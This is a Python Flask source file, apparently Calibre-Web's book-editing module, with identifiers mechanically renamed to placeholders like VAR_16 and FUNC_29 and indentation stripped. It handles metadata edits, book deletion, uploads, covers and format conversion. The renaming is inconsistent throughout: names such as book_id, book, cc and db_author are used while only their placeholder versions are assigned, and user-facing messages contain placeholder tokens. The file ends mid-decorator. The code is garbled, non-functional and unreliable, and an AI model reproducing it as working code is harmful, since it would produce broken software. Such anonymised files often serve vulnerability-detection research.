if VAR_4 == 'languages':
VAR_83 = VAR_8.lang_code
elif VAR_4 == 'custom':
VAR_83 = VAR_8.value
else:
VAR_83 = VAR_8.name
for VAR_11 in VAR_9:
VAR_10 = VAR_6.query(VAR_8).filter(VAR_83 == VAR_11).first()
if VAR_4 == 'author':
VAR_102 = VAR_8(VAR_11, helper.get_sorted_author(VAR_11.replace('|', ',')), "")
elif VAR_4 == 'series':
VAR_102 = VAR_8(VAR_11, add_element)
elif VAR_4 == 'custom':
VAR_102 = VAR_8(value=VAR_11)
elif VAR_4 == 'publisher':
VAR_102 = VAR_8(VAR_11, None)
else: # VAR_4 should be tag or language
VAR_102 = VAR_8(VAR_11)
if VAR_10 is None:
VAR_48 = True
VAR_6.add(VAR_102)
VAR_3.append(VAR_102)
else:
VAR_10 = FUNC_6(VAR_10, VAR_11, VAR_4)
VAR_48 = True
VAR_48 = True
VAR_3.append(VAR_10)
return VAR_48
def FUNC_6(VAR_10, VAR_11, VAR_4):
if VAR_4 == 'custom':
if VAR_10.value != VAR_11:
VAR_10.value = VAR_11 # ToDo: Before VAR_102, but this is not plausible
elif VAR_4 == 'languages':
if VAR_10.lang_code != VAR_11:
VAR_10.lang_code = VAR_11
elif VAR_4 == 'series':
if VAR_10.name != VAR_11:
VAR_10.name = VAR_11
VAR_10.sort = VAR_11
elif VAR_4 == 'author':
if VAR_10.name != VAR_11:
VAR_10.name = VAR_11
VAR_10.sort = VAR_11.replace('|', ',')
elif VAR_4 == 'publisher':
if VAR_10.name != VAR_11:
VAR_10.name = VAR_11
VAR_10.sort = None
elif VAR_10.name != VAR_11:
VAR_10.name = VAR_11
return VAR_10
def FUNC_7(VAR_5, VAR_3, VAR_8, VAR_6, VAR_4):
if not isinstance(VAR_5, list):
raise TypeError(str(VAR_5) + " should be passed as a list")
VAR_5 = [x for x in VAR_5 if x != '']
VAR_7 = FUNC_2(VAR_3, VAR_4, VAR_5)
VAR_9 = FUNC_3(VAR_3, VAR_4, VAR_5)
VAR_48 = FUNC_4(VAR_3, VAR_6, VAR_7)
if len(VAR_9) > 0:
VAR_48 |= FUNC_5(VAR_3, VAR_8, VAR_6, VAR_4, VAR_9)
return VAR_48
def FUNC_8(VAR_12, VAR_13, VAR_6):
VAR_48 = False
VAR_49 = False
VAR_50 = dict([(identifier.type.lower(), identifier) for identifier in VAR_12])
if len(VAR_12) != len(VAR_50):
VAR_49 = True
VAR_51 = dict([(identifier.type.lower(), identifier) for identifier in VAR_13 ])
for identifier_type, identifier in VAR_51.items():
if identifier_type not in VAR_50.keys():
VAR_6.delete(identifier)
VAR_48 = True
else:
VAR_103 = VAR_50[identifier_type]
identifier.type = VAR_103.type
identifier.val = VAR_103.val
for identifier_type, identifier in VAR_50.items():
if identifier_type not in VAR_51.keys():
VAR_6.add(identifier)
VAR_48 = True
return VAR_48, VAR_49
@VAR_0.route("/ajax/delete/<int:VAR_14>")
@login_required
def FUNC_9(VAR_14):
return Response(FUNC_13(VAR_14, "", True), mimetype='application/json')
@VAR_0.route("/delete/<int:VAR_14>", defaults={'book_format': ""})
@VAR_0.route("/delete/<int:VAR_14>/<string:VAR_15>")
@login_required
def FUNC_10(VAR_14, VAR_15):
return FUNC_13(VAR_14, VAR_15, False)
def FUNC_11(VAR_14, VAR_16):
ub.session.query(ub.BookShelf).filter(ub.BookShelf.book_id == VAR_14).delete()
ub.session.query(ub.ReadBook).filter(ub.ReadBook.book_id == VAR_14).delete()
ub.delete_download(VAR_14)
ub.session_commit()
FUNC_7([u''], VAR_16.authors, db.Authors, calibre_db.session, 'author')
FUNC_7([u''], VAR_16.tags, db.Tags, calibre_db.session, 'tags')
FUNC_7([u''], VAR_16.series, db.Series, calibre_db.session, 'series')
FUNC_7([u''], VAR_16.languages, db.Languages, calibre_db.session, 'languages')
FUNC_7([u''], VAR_16.publishers, db.Publishers, calibre_db.session, 'publishers')
VAR_52 = calibre_db.session.query(db.Custom_Columns). \
filter(db.Custom_Columns.datatype.notin_(db.cc_exceptions)).all()
for VAR_28 in VAR_52:
VAR_30 = "custom_column_" + str(VAR_28.id)
if not VAR_28.is_multiple:
if len(getattr(VAR_16, VAR_30)) > 0:
if VAR_28.datatype == 'bool' or VAR_28.datatype == 'integer' or VAR_28.datatype == 'float':
VAR_105 = getattr(VAR_16, VAR_30)[0]
getattr(VAR_16, VAR_30).remove(VAR_105)
VAR_1.debug('remove ' + str(VAR_28.id))
calibre_db.session.delete(VAR_105)
calibre_db.session.commit()
elif VAR_28.datatype == 'rating':
VAR_105 = getattr(VAR_16, VAR_30)[0]
getattr(VAR_16, VAR_30).remove(VAR_105)
if len(VAR_105.books) == 0:
VAR_1.debug('remove ' + str(VAR_28.id))
calibre_db.session.delete(VAR_105)
calibre_db.session.commit()
else:
VAR_105 = getattr(VAR_16, VAR_30)[0]
getattr(VAR_16, VAR_30).remove(VAR_105)
VAR_1.debug('remove ' + str(VAR_28.id))
calibre_db.session.delete(VAR_105)
calibre_db.session.commit()
else:
FUNC_7([u''], getattr(VAR_16, VAR_30), db.cc_classes[VAR_28.id],
calibre_db.session, 'custom')
calibre_db.session.query(db.Books).filter(db.Books.id == VAR_14).delete()
def FUNC_12(VAR_15, VAR_17, VAR_18, VAR_14):
if VAR_15:
if VAR_17:
return json.dumps([VAR_18, {"location": url_for("editbook.edit_book", VAR_14=book_id),
"type": "success",
"format": VAR_15,
"message": _('Book Format Successfully Deleted')}])
else:
flash(_('Book Format Successfully Deleted'), category="success")
return redirect(url_for('editbook.edit_book', VAR_14=book_id))
else:
if VAR_17:
return json.dumps([VAR_18, {"location": url_for('web.index'),
"type": "success",
"format": VAR_15,
"message": _('Book Successfully Deleted')}])
else:
flash(_('Book Successfully Deleted'), category="success")
return redirect(url_for('web.index'))
def FUNC_13(VAR_14, VAR_15, VAR_17):
VAR_18 = {}
if current_user.role_delete_books():
VAR_16 = calibre_db.get_book(VAR_14)
if VAR_16:
try:
VAR_68, VAR_49 = helper.delete_book(VAR_16, config.config_calibre_dir, VAR_15=book_format.upper())
if not VAR_68:
if VAR_17:
return json.dumps([{"location": url_for("editbook.edit_book", VAR_14=book_id),
"type": "danger",
"format": "",
"message": VAR_49}])
else:
flash(VAR_49, category="error")
return redirect(url_for('editbook.edit_book', VAR_14=book_id))
if VAR_49:
if VAR_17:
VAR_18 = {"location": url_for("editbook.edit_book", VAR_14=book_id),
"type": "warning",
"format": "",
"message": VAR_49}
else:
flash(VAR_49, category="warning")
if not VAR_15:
FUNC_11(VAR_14, VAR_16)
else:
calibre_db.session.query(db.Data).filter(db.Data.book == VAR_16.id).\
filter(db.Data.format == VAR_15).delete()
calibre_db.session.commit()
except Exception as ex:
VAR_1.debug_or_exception(ex)
calibre_db.session.rollback()
if VAR_17:
return json.dumps([{"location": url_for("editbook.edit_book", VAR_14=book_id),
"type": "danger",
"format": "",
"message": ex}])
else:
flash(str(ex), category="error")
return redirect(url_for('editbook.edit_book', VAR_14=book_id))
else:
VAR_1.error('Book with id "%s" could not be deleted: not found', VAR_14)
return FUNC_12(VAR_15, VAR_17, VAR_18, VAR_14)
def FUNC_14(VAR_14):
VAR_52 = calibre_db.session.query(db.Custom_Columns).filter(db.Custom_Columns.datatype.notin_(db.cc_exceptions)).all()
VAR_16 = calibre_db.get_filtered_book(VAR_14, allow_show_archived=True)
if not VAR_16:
flash(_(u"Oops! Selected VAR_16 VAR_36 is unavailable. File does not exist or is not accessible"), category="error")
return redirect(url_for("web.index"))
for lang in VAR_16.languages:
lang.language_name = isoLanguages.get_language_name(get_locale(), lang.lang_code)
VAR_16 = calibre_db.order_authors(VAR_16)
VAR_53 = []
for VAR_37 in VAR_16.authors:
VAR_53.append(VAR_37.name.replace('|', ','))
VAR_54=list()
VAR_55 = list()
VAR_56=None
if config.config_converterpath:
for file in VAR_16.data:
if file.format.lower() in constants.EXTENSIONS_CONVERT_FROM:
VAR_54.append(file.format.lower())
if config.config_kepubifypath and 'epub' in [file.format.lower() for file in VAR_16.data]:
VAR_56 = True
if not config.config_converterpath:
VAR_54.append('epub')
if config.config_converterpath:
VAR_55 = constants.EXTENSIONS_CONVERT_TO[:]
for file in VAR_16.data:
if file.format.lower() in VAR_55:
allowed_conversion_formats.remove(file.format.lower())
if VAR_56:
VAR_55.append('kepub')
return render_title_template('book_edit.html', VAR_16=book, VAR_115=VAR_53, VAR_52=cc,
VAR_36=_(u"edit metadata"), page="editbook",
conversion_formats=VAR_55,
config=config,
source_formats=VAR_54)
def FUNC_15(VAR_19, VAR_16):
VAR_48 = False
if VAR_19["rating"].strip():
VAR_84 = False
if len(VAR_16.ratings) > 0:
VAR_84 = VAR_16.ratings[0].rating
VAR_85 = int(float(VAR_19["rating"]) * 2)
if VAR_85 != VAR_84:
VAR_48 = True
VAR_104 = calibre_db.session.query(db.Ratings).filter(db.Ratings.rating == VAR_85).first()
if VAR_104:
VAR_16.ratings.append(VAR_104)
else:
VAR_117 = db.Ratings(rating=VAR_85)
VAR_16.ratings.append(VAR_117)
if VAR_84:
VAR_16.ratings.remove(VAR_16.ratings[0])
else:
if len(VAR_16.ratings) > 0:
VAR_16.ratings.remove(VAR_16.ratings[0])
VAR_48 = True
return VAR_48
def FUNC_16(VAR_20, VAR_16):
VAR_57 = VAR_20.split(',')
VAR_57 = list(map(lambda it: it.strip(), VAR_57))
VAR_57 = helper.uniq(VAR_57)
return FUNC_7(VAR_57, VAR_16.tags, db.Tags, calibre_db.session, 'tags')
def FUNC_17(VAR_21, VAR_16):
VAR_58 = [VAR_21.strip()]
VAR_58 = [x for x in VAR_58 if x != '']
return FUNC_7(VAR_58, VAR_16.series, db.Series, calibre_db.session, 'series')
def FUNC_18(VAR_22, VAR_16):
VAR_38 = False
VAR_22 = VAR_22 or '1'
if not VAR_22.replace('.', '', 1).isdigit():
flash(_("%(seriesindex)s is not a valid number, skipping", seriesindex=VAR_22), category="warning")
return False
if VAR_16.series_index != VAR_22:
VAR_16.series_index = VAR_22
VAR_38 = True
return VAR_38
def FUNC_19(VAR_23, VAR_16):
VAR_38 = False
if VAR_23:
comments = clean_html(VAR_23)
if len(VAR_16.comments):
if VAR_16.comments[0].text != VAR_23:
VAR_16.comments[0].text = clean_html(VAR_23)
VAR_38 = True
else:
if VAR_23:
VAR_16.comments.append(db.Comments(text=VAR_23, VAR_16=VAR_16.id))
VAR_38 = True
return VAR_38
def FUNC_20(VAR_24, VAR_16, VAR_25=False, VAR_26=None):
VAR_59 = VAR_24.split(',')
VAR_60 = []
if not VAR_25:
VAR_61 = isoLanguages.get_language_codes(get_locale(), VAR_59, VAR_60)
else:
VAR_61 = isoLanguages.get_valid_language_codes(get_locale(), VAR_59, VAR_60)
for l in VAR_60:
VAR_1.error('%s is not a valid language', l)
if isinstance(VAR_26, list):
VAR_26.append(l)
else:
flash(_(u"%(langname)s is not a valid language", langname=l), category="warning")
if VAR_25 and len(VAR_61) == 1:
if VAR_61[0] != current_user.filter_language() and current_user.filter_language() != "all":
VAR_61[0] = calibre_db.session.query(db.Languages). \
filter(db.Languages.lang_code == current_user.filter_language()).first().lang_code
VAR_61 = helper.uniq(VAR_61)
return FUNC_7(VAR_61, VAR_16.languages, db.Languages, calibre_db.session, 'languages')
def FUNC_21(VAR_27, VAR_16):
VAR_48 = False
if VAR_27:
VAR_86 = VAR_27.rstrip().strip()
if len(VAR_16.publishers) == 0 or (len(VAR_16.publishers) > 0 and VAR_86 != VAR_16.publishers[0].name):
VAR_48 |= FUNC_7([VAR_86], VAR_16.publishers, db.Publishers, calibre_db.session,
'publisher')
elif len(VAR_16.publishers):
VAR_48 |= FUNC_7([], VAR_16.publishers, db.Publishers, calibre_db.session, 'publisher')
return VAR_48
def FUNC_22(VAR_14, VAR_16, VAR_28, VAR_19, VAR_29, VAR_30):
VAR_48 = False
if VAR_19[VAR_30] == 'None':
VAR_19[VAR_30] = None
elif VAR_28.datatype == 'bool':
VAR_19[VAR_30] = 1 if VAR_19[VAR_30] == 'True' else 0
elif VAR_28.datatype == 'comments':
VAR_19[VAR_30] = Markup(VAR_19[VAR_30]).unescape()
if VAR_19[VAR_30]:
VAR_19[VAR_30] = clean_html(VAR_19[VAR_30])
elif VAR_28.datatype == 'datetime':
try:
VAR_19[VAR_30] = datetime.strptime(VAR_19[VAR_30], "%Y-%m-%d")
except ValueError:
VAR_19[VAR_30] = db.Books.DEFAULT_PUBDATE
if VAR_19[VAR_30] != VAR_29:
if VAR_29 is not None:
if VAR_19[VAR_30] is not None:
setattr(getattr(VAR_16, VAR_30)[0], 'value', VAR_19[VAR_30])
VAR_48 = True
else:
VAR_105 = getattr(VAR_16, VAR_30)[0]
getattr(VAR_16, VAR_30).remove(VAR_105)
calibre_db.session.delete(VAR_105)
VAR_48 = True
else:
VAR_87 = db.cc_classes[VAR_28.id]
VAR_88 = VAR_87(value=VAR_19[VAR_30], VAR_16=VAR_14)
calibre_db.session.add(VAR_88)
VAR_48 = True
return VAR_48, VAR_19
def FUNC_23(VAR_16, VAR_28, VAR_19, VAR_29, VAR_30):
VAR_48 = False
if VAR_28.datatype == 'rating':
VAR_19[VAR_30] = str(int(float(VAR_19[VAR_30]) * 2))
if VAR_19[VAR_30].strip() != VAR_29:
if VAR_29 is not None:
VAR_105 = getattr(VAR_16, VAR_30)[0]
getattr(VAR_16, VAR_30).remove(VAR_105)
if len(VAR_105.books) == 0:
calibre_db.session.delete(VAR_105)
VAR_48 = True
VAR_87 = db.cc_classes[VAR_28.id]
VAR_88 = calibre_db.session.query(VAR_87).filter(
VAR_87.value == VAR_19[VAR_30].strip()).first()
if VAR_88 is None:
VAR_88 = VAR_87(value=VAR_19[VAR_30].strip())
calibre_db.session.add(VAR_88)
VAR_48 = True
calibre_db.session.flush()
VAR_88 = calibre_db.session.query(VAR_87).filter(
VAR_87.value == VAR_19[VAR_30].strip()).first()
getattr(VAR_16, VAR_30).append(VAR_88)
return VAR_48, VAR_19
def FUNC_24(VAR_14, VAR_16, VAR_19):
VAR_48 = False
VAR_52 = calibre_db.session.query(db.Custom_Columns).filter(db.Custom_Columns.datatype.notin_(db.cc_exceptions)).all()
for VAR_28 in VAR_52:
VAR_30 = "custom_column_" + str(VAR_28.id)
if not VAR_28.is_multiple:
if len(getattr(VAR_16, VAR_30)) > 0:
VAR_29 = getattr(VAR_16, VAR_30)[0].value
else:
VAR_29 = None
if VAR_19[VAR_30].strip():
if VAR_28.datatype in ['int', 'bool', 'float', "datetime", "comments"]:
VAR_48, VAR_19 = FUNC_22(VAR_14, VAR_16, VAR_28, VAR_19, VAR_29, VAR_30)
else:
VAR_48, VAR_19 = FUNC_23(VAR_16, VAR_28, VAR_19, VAR_29, VAR_30)
else:
if VAR_29 is not None:
VAR_105 = getattr(VAR_16, VAR_30)[0]
getattr(VAR_16, VAR_30).remove(VAR_105)
if not VAR_105.books or len(VAR_105.books) == 0:
calibre_db.session.delete(VAR_105)
VAR_48 = True
else:
VAR_57 = VAR_19[VAR_30].split(',')
VAR_57 = list(map(lambda it: it.strip(), VAR_57))
VAR_48 |= FUNC_7(VAR_57,
getattr(VAR_16, VAR_30),
db.cc_classes[VAR_28.id],
calibre_db.session,
'custom')
return VAR_48
def FUNC_25(VAR_31, VAR_16, VAR_14):
if 'btn-VAR_25-format' in VAR_31.files:
VAR_39 = VAR_31.files['btn-VAR_25-format']
if VAR_39.filename != '':
if not current_user.role_upload():
abort(403)
if '.' in VAR_39.filename:
VAR_96 = VAR_39.filename.rsplit('.', 1)[-1].lower()
if VAR_96 not in constants.EXTENSIONS_UPLOAD and '' not in constants.EXTENSIONS_UPLOAD:
flash(_("File extension '%(ext)s' is not allowed to be uploaded to this server", ext=VAR_96),
category="error")
return redirect(url_for('web.show_book', VAR_14=VAR_16.id))
else:
flash(_('File to be uploaded must have an extension'), category="error")
return redirect(url_for('web.show_book', VAR_14=VAR_16.id))
VAR_106 = VAR_16.path.rsplit('/', 1)[-1]
VAR_107 = os.path.normpath(os.path.join(config.config_calibre_dir, VAR_16.path))
VAR_108 = os.path.join(VAR_107, VAR_106 + '.' + VAR_96)
if not os.path.exists(VAR_107):
try:
os.makedirs(VAR_107)
except OSError:
flash(_(u"Failed to create VAR_72 %(path)s (Permission denied).", VAR_72=VAR_107), category="error")
return redirect(url_for('web.show_book', VAR_14=VAR_16.id))
try:
VAR_39.save(VAR_108)
except OSError:
flash(_(u"Failed to store file %(file)s.", file=VAR_108), category="error")
return redirect(url_for('web.show_book', VAR_14=VAR_16.id))
VAR_73 = os.path.getsize(VAR_108)
VAR_109 = calibre_db.get_book_format(VAR_14, VAR_96.upper())
if VAR_109:
VAR_1.warning('Book format %s already existing', VAR_96.upper())
else:
try:
VAR_119 = db.Data(VAR_14, VAR_96.upper(), VAR_73, VAR_106)
calibre_db.session.add(VAR_119)
calibre_db.session.commit()
calibre_db.update_title_sort(config)
except (OperationalError, IntegrityError) as e:
calibre_db.session.rollback()
VAR_1.error('Database VAR_49: %s', e)
flash(_(u"Database VAR_49: %(VAR_49)s.", VAR_49=e), category="error")
return redirect(url_for('web.show_book', VAR_14=VAR_16.id))
VAR_110=_(u"File format %(ext)s added to %(VAR_16)s", ext=VAR_96.upper(), VAR_16=VAR_16.title)
WorkerThread.add(current_user.name, TaskUpload(
"<a href=\"" + url_for('web.show_book', VAR_14=VAR_16.id) + "\">" + VAR_110 + "</a>"))
return uploader.process(
VAR_108, *os.path.splitext(VAR_39.filename),
rarExecutable=config.config_rarfile_location)
def FUNC_26(VAR_31, VAR_16):
if 'btn-VAR_25-cover' in VAR_31.files:
VAR_39 = VAR_31.files['btn-VAR_25-cover']
if VAR_39.filename != '':
if not current_user.role_upload():
abort(403)
VAR_80, VAR_111 = helper.save_cover(VAR_39, VAR_16.path)
if VAR_80 is True:
return True
else:
flash(VAR_111, category="error")
return False
return None
def FUNC_27(VAR_16, VAR_32):
VAR_32 = book_title.rstrip().strip()
if VAR_16.title != VAR_32:
if VAR_32 == '':
VAR_32 = _(u'Unknown')
VAR_16.title = VAR_32
return True
return False
def FUNC_28(VAR_16, VAR_33, VAR_34=True):
VAR_62 = VAR_33.split('&')
VAR_62 = list(map(lambda it: it.strip().replace(',', '|'), VAR_62))
VAR_62 = helper.uniq(VAR_62)
if VAR_62 == ['']:
VAR_62 = [_(u'Unknown')] # prevent empty Author
VAR_63 = FUNC_7(VAR_62, VAR_16.authors, db.Authors, calibre_db.session, 'author')
VAR_64 = list()
for inp in VAR_62:
VAR_89 = calibre_db.session.query(db.Authors).filter(db.Authors.name == inp).first()
if not VAR_89:
VAR_89 = helper.get_sorted_author(inp)
else:
VAR_89 = VAR_89.sort
VAR_64.append(helper.get_sorted_author(VAR_89))
VAR_65 = ' & '.join(VAR_64)
if VAR_16.author_sort != VAR_65 and VAR_34:
VAR_16.author_sort = VAR_65
VAR_63 = True
return VAR_62, VAR_63
@VAR_0.route("/admin/VAR_16/<int:VAR_14>", methods=['GET', 'POST'])
@login_required_if_no_ano
@FUNC_1
def FUNC_29(VAR_14):
VAR_38 = False
try:
calibre_db.update_title_sort(config)
except sqliteOperationalError as e:
VAR_1.debug_or_exception(e)
calibre_db.session.rollback()
if VAR_31.method != 'POST':
return FUNC_14(VAR_14)
VAR_16 = calibre_db.get_filtered_book(VAR_14, allow_show_archived=True)
if not VAR_16:
flash(_(u"Oops! Selected VAR_16 VAR_36 is unavailable. File does not exist or is not accessible"), category="error")
return redirect(url_for("web.index"))
VAR_35 = FUNC_25(VAR_31, VAR_16, VAR_14)
if FUNC_26(VAR_31, VAR_16) is True:
VAR_16.has_cover = 1
VAR_38 = True
try:
VAR_19 = VAR_31.form.to_dict()
FUNC_30(VAR_19, VAR_35)
VAR_90 = None
VAR_91 = FUNC_27(VAR_16, VAR_19["book_title"])
VAR_62, VAR_92 = FUNC_28(VAR_16, VAR_19["author_name"])
if VAR_92 or VAR_91:
VAR_90 = VAR_16.id
VAR_38 = True
if config.config_use_google_drive:
gdriveutils.updateGdriveCalibreFromLocal()
VAR_49 = False
if VAR_90:
VAR_49 = helper.update_dir_stucture(VAR_90, config.config_calibre_dir, VAR_62[0])
if not VAR_49:
if "cover_url" in VAR_19:
if VAR_19["cover_url"]:
if not current_user.role_upload():
return "", (403)
if VAR_19["cover_url"].endswith('/static/generic_cover.jpg'):
VAR_16.has_cover = 0
else:
VAR_68, VAR_49 = helper.save_cover_from_url(VAR_19["cover_url"], VAR_16.path)
if VAR_68 is True:
VAR_16.has_cover = 1
VAR_38 = True
else:
flash(VAR_49, category="error")
VAR_38 |= FUNC_18(VAR_19["series_index"], VAR_16)
VAR_38 |= FUNC_19(Markup(VAR_19['description']).unescape(), VAR_16)
VAR_12 = FUNC_31(VAR_19, VAR_16)
VAR_112, VAR_18 = FUNC_8(VAR_12, VAR_16.identifiers, calibre_db.session)
if VAR_18:
flash(_("Identifiers are not Case Sensitive, Overwriting Old Identifier"), category="warning")
VAR_38 |= VAR_112
VAR_38 |= FUNC_16(VAR_19['tags'], VAR_16)
VAR_38 |= FUNC_17(VAR_19["series"], VAR_16)
VAR_38 |= FUNC_21(VAR_19['publisher'], VAR_16)
VAR_38 |= FUNC_20(VAR_19['languages'], VAR_16)
VAR_38 |= FUNC_15(VAR_19, VAR_16)
VAR_38 |= FUNC_24(VAR_14, VAR_16, VAR_19)
if VAR_19["pubdate"]:
try:
VAR_16.pubdate = datetime.strptime(VAR_19["pubdate"], "%Y-%m-%d")
except ValueError:
VAR_16.pubdate = db.Books.DEFAULT_PUBDATE
else:
VAR_16.pubdate = db.Books.DEFAULT_PUBDATE
if VAR_38:
VAR_16.last_modified = datetime.utcnow()
calibre_db.session.merge(VAR_16)
calibre_db.session.commit()
if config.config_use_google_drive:
gdriveutils.updateGdriveCalibreFromLocal()
if "detail_view" in VAR_19:
return redirect(url_for('web.show_book', VAR_14=VAR_16.id))
else:
flash(_("Metadata successfully updated"), category="success")
return FUNC_14(VAR_14)
else:
calibre_db.session.rollback()
flash(VAR_49, category="error")
return FUNC_14(VAR_14)
except Exception as ex:
VAR_1.debug_or_exception(ex)
calibre_db.session.rollback()
flash(_("Error editing VAR_16, please check logfile for details"), category="error")
return redirect(url_for('web.show_book', VAR_14=VAR_16.id))
def FUNC_30(VAR_19, VAR_35):
if VAR_19['author_name'] == _(u'Unknown'):
VAR_19['author_name'] = ''
if VAR_19['book_title'] == _(u'Unknown'):
VAR_19['book_title'] = ''
for VAR_93, m_field in [
('tags', 'tags'), ('author_name', 'author'), ('series', 'series'),
('series_index', 'series_id'), ('languages', 'languages'),
('book_title', 'title')]:
VAR_19[VAR_93] = VAR_19[VAR_93] or getattr(VAR_35, m_field, '')
VAR_19["description"] = VAR_19["description"] or Markup(
getattr(VAR_35, 'description', '')).unescape()
def FUNC_31(VAR_19, VAR_16):
VAR_66 = 'identifier-type-'
VAR_67 = 'identifier-val-'
VAR_68 = []
for type_key, type_value in VAR_19.items():
if not type_key.startswith(VAR_66):
continue
VAR_94 = VAR_67 + type_key[len(VAR_66):]
if VAR_94 not in VAR_19.keys():
continue
VAR_68.append(db.Identifiers(VAR_19[VAR_94], type_value, VAR_16.id))
return VAR_68
def FUNC_32(VAR_36, VAR_37):
if VAR_36 != _(u'Unknown') and VAR_37 != _(u'Unknown'):
VAR_95 = calibre_db.check_exists_book(VAR_37, VAR_36)
if VAR_95:
VAR_1.info("Uploaded VAR_16 probably exists in library")
flash(_(u"Uploaded VAR_16 probably exists in the library, consider to VAR_63 before VAR_25 new: ")
+ Markup(render_title_template('book_exists_flash.html', VAR_95=entry)), category="warning")
VAR_62 = VAR_37.split('&')
VAR_62 = list(map(lambda it: it.strip().replace(',', '|'), VAR_62))
VAR_62 = helper.uniq(VAR_62)
if VAR_62 == ['']:
VAR_62 = [_(u'Unknown')] # prevent empty Author
VAR_64 = list()
VAR_69 = None
for inp in VAR_62:
VAR_89 = calibre_db.session.query(db.Authors).filter(db.Authors.name == inp).first()
if not VAR_89:
if not VAR_69:
db_author = db.Authors(inp, helper.get_sorted_author(inp), "")
calibre_db.session.add(VAR_69)
calibre_db.session.commit()
VAR_113 = helper.get_sorted_author(inp)
else:
if not VAR_69:
db_author = VAR_89
VAR_113 = VAR_89.sort
VAR_64.append(VAR_113)
VAR_65 = ' & '.join(VAR_64)
return VAR_65, VAR_62, VAR_69
def FUNC_33(VAR_38, VAR_35):
VAR_36 = VAR_35.title
VAR_37 = VAR_35.author
VAR_65, VAR_62, VAR_69 = FUNC_32(VAR_36, VAR_37)
VAR_70 = helper.get_valid_filename(VAR_36)
VAR_71 = helper.get_valid_filename(VAR_69.name)
VAR_72 = os.path.join(VAR_71, VAR_70).replace('\\', '/')
VAR_40 = db.Books(VAR_36, "", VAR_65, datetime.utcnow(), datetime(101, 1, 1),
'1', datetime.utcnow(), VAR_72, VAR_35.cover, VAR_69, [], "")
VAR_38 |= FUNC_7(VAR_62, VAR_40.authors, db.Authors, calibre_db.session,
'author')
VAR_38 |= FUNC_18(VAR_35.series_id, VAR_40)
VAR_38 |= FUNC_20(VAR_35.languages, VAR_40, VAR_25=True)
VAR_38 |= FUNC_16(VAR_35.tags, VAR_40)
VAR_38 |= FUNC_21(VAR_35.publisher, VAR_40)
VAR_38 |= FUNC_17(VAR_35.series, VAR_40)
VAR_73 = os.path.getsize(VAR_35.file_path)
VAR_74 = db.Data(VAR_40, VAR_35.extension.upper()[1:], VAR_73, VAR_70)
VAR_40.data.append(VAR_74)
calibre_db.session.add(VAR_40)
calibre_db.session.flush()
return VAR_40, VAR_62, VAR_70
def FUNC_34(VAR_39):
if '.' in VAR_39.filename:
VAR_96 = VAR_39.filename.rsplit('.', 1)[-1].lower()
if VAR_96 not in constants.EXTENSIONS_UPLOAD and '' not in constants.EXTENSIONS_UPLOAD:
flash(
_("File extension '%(ext)s' is not allowed to be uploaded to this server",
ext=VAR_96), category="error")
return None, Response(json.dumps({"location": url_for("web.index")}), mimetype='application/json')
else:
flash(_('File to be uploaded must have an extension'), category="error")
return None, Response(json.dumps({"location": url_for("web.index")}), mimetype='application/json')
try:
VAR_35 = uploader.upload(VAR_39, config.config_rarfile_location)
except (IOError, OSError):
VAR_1.error("File %s could not saved to temp dir", VAR_39.filename)
flash(_(u"File %(filename)s could not saved to temp dir",
filename=VAR_39.filename), category="error")
return None, Response(json.dumps({"location": url_for("web.index")}), mimetype='application/json')
return VAR_35, None
def FUNC_35(VAR_35, VAR_40):
if VAR_35.cover:
VAR_97 = VAR_35.cover
else:
VAR_97 = os.path.join(constants.STATIC_DIR, 'generic_cover.jpg')
VAR_75 = os.path.join(config.config_calibre_dir, VAR_40.path, "cover.jpg")
try:
copyfile(VAR_97, VAR_75)
if VAR_35.cover:
os.unlink(VAR_35.cover)
except OSError as e:
VAR_1.error("Failed to move cover file %s: %s", VAR_75, e)
flash(_(u"Failed to Move Cover File %(file)s: %(VAR_49)s", file=VAR_75,
VAR_49=e),
category="error")
@VAR_0.route("/upload", methods=["GET", "POST"])
@login_required_if_no_ano
@FUNC_0
def VAR_25():
if not config.config_uploading:
abort(404)
if VAR_31.method == 'POST' and 'btn-upload' in VAR_31.files:
for VAR_39 in VAR_31.files.getlist("btn-upload"):
try:
VAR_38 = False
calibre_db.update_title_sort(config)
calibre_db.session.connection().connection.connection.create_function('uuid4', 0, lambda: str(uuid4()))
VAR_35, VAR_49 = FUNC_34(VAR_39)
if VAR_49:
return VAR_49
VAR_40, VAR_62, VAR_70 = FUNC_33(VAR_38, VAR_35)
VAR_38 |= FUNC_19(Markup(VAR_35.description).unescape(), VAR_40)
VAR_14 = VAR_40.id
VAR_36 = VAR_40.title
VAR_49 = helper.update_dir_structure_file(VAR_14,
config.config_calibre_dir,
VAR_62[0],
VAR_35.file_path,
VAR_70 + VAR_35.extension.lower())
FUNC_35(VAR_35, VAR_40)
calibre_db.session.commit()
if config.config_use_google_drive:
gdriveutils.updateGdriveCalibreFromLocal()
if VAR_49:
flash(VAR_49, category="error")
VAR_110=_(u"File %(file)s uploaded", file=VAR_36)
WorkerThread.add(current_user.name, TaskUpload(
"<a href=\"" + url_for('web.show_book', VAR_14=book_id) + "\">" + VAR_110 + "</a>"))
if len(VAR_31.files.getlist("btn-upload")) < 2:
if current_user.role_edit() or current_user.role_admin():
VAR_120 = {"location": url_for('editbook.edit_book', VAR_14=book_id)}
return Response(json.dumps(VAR_120), mimetype='application/json')
else:
VAR_120 = {"location": url_for('web.show_book', VAR_14=book_id)}
return Response(json.dumps(VAR_120), mimetype='application/json')
except (OperationalError, IntegrityError) as e:
calibre_db.session.rollback()
VAR_1.error("Database VAR_49: %s", e)
flash(_(u"Database VAR_49: %(VAR_49)s.", VAR_49=e), category="error")
return Response(json.dumps({"location": url_for("web.index")}), mimetype='application/json')
@VAR_0.route("/admin/VAR_16/convert/<int:VAR_14>", methods=['POST'])
@login_required_if_no_ano
@FUNC_1
def FUNC_37(VAR_14):
VAR_76 = VAR_31.form.get('book_format_from', None)
VAR_77 = VAR_31.form.get('book_format_to', None)
if (VAR_76 is None) or (VAR_77 is None):
flash(_(u"Source or destination format for conversion missing"), category="error")
return redirect(url_for('editbook.edit_book', VAR_14=book_id))
VAR_1.info('converting: VAR_16 id: %s from: %s to: %s', VAR_14, VAR_76, VAR_77)
VAR_78 = helper.convert_book_format(VAR_14, config.config_calibre_dir, VAR_76.upper(),
VAR_77.upper(), current_user.name)
if VAR_78 is None:
flash(_(u"Book successfully queued for converting to %(VAR_15)s",
VAR_15=VAR_77),
category="success")
else:
flash(_(u"There was an VAR_49 converting this VAR_16: %(res)s", res=VAR_78), category="error")
return redirect(url_for('editbook.edit_book', VAR_14=book_id))
@VAR_0.route("/scholarsearch/<VAR_41>",methods=['GET'])
@login_required_if_no_ano
@FUNC_1
